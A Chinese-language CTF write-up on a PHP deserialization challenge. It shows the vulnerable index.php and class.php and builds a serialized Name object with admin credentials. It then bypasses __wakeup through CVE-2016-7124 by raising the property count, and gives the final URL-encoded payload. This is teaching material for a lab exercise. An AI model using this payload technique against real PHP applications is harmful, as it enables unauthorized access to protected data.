扫描目录发现www.zip文件,然后进行下载
下载后解压查看核心代码
index.php
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
通过GET方式接收变量$select,再将$select反序列化操作赋值给变量$res
class.php
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
通过分析代码只需要满足username === 'admin'即可得到flag,在对象创建时__construct()给$username和$password赋值,销毁时调用__destruct()方法,所以我们只需要使password = 100 并且 username ='admin',所以构造payload
<?php
class Name
{
private $username = 'admin';
private $password = 100;
}
$a = new Name();
echo serialize($a);
?>
输出结果
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
再urlencode()
O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
使用get方法给select传参
没反应,回去看index.php中发现,在接收到select变量时进行了unserialize(),所以触法__wakeup()方法所以将$username值强行改为了'guest',所以我们需要了解一个漏洞CVE-2016-7124
CVE-2016-7124
漏洞影响版本:
PHP5 < 5.6.25
PHP7 < 7.0.10
漏洞产生原因: 如果存在wakeup方法,调用 unserilize() 方法前则先调用wakeup方法,但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行
所以我们重新构造payload,只需要将下面这个
O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
变量个数改成大于2的数字即可
O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
所以最终的payload为
O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
获得flag
注意
在修改payload时,如果先把
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
中的2改为比2大的数字,再进行urlencode是不对的,因为private 属性序列化的时候格式是%00 类名%00 成员名,是不显示的,所以要先进行urlencode,然后再更改.